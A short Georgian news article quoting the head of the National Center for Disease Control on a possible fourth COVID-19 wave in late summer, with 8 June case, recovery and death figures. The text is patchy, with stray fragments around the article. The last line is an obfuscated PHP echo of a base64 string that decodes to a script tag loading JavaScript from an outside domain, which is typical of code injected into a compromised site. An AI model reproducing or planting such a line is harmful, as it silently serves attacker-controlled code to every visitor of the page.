celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის განცხადებით, ქვეყანაში ეპიდემიის მეოთხე ტალღა გავრცელების საფრთხე ზაფხულის ბოლოს იქნება. ამის შესახებ ამირან გამყრელიძემ საკოორდინაციო საბჭოს დასრულების შემდეგ გამართულ პრესკონფერენციაზე განაცხადა.
 
„თუ არ ავიცრებით, თუ არ დავიცავთ რეგულაციებს, შეიძლება, მეოთხე ტალღა ზაფხულის ბოლოს ან შემოდგომის დასაწყისში იყოს“, - განაცხადა ამირან გამყრელიძემ.
 
შეგახსენებთ, რომ 8 ივნისის სტატისტიკური მონაცემებით, ბოლო 24 საათში კორონავირუსის დადასტურებულ შემთხვევათა რიცხვი - 1 023-ით, ხოლო გამოჯანმრთელებულების 510-ით გაიზარდა. ვირუსით ქვეყანაში კიდევ 17 ადამიანი გარდაიცვალა.
1293
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");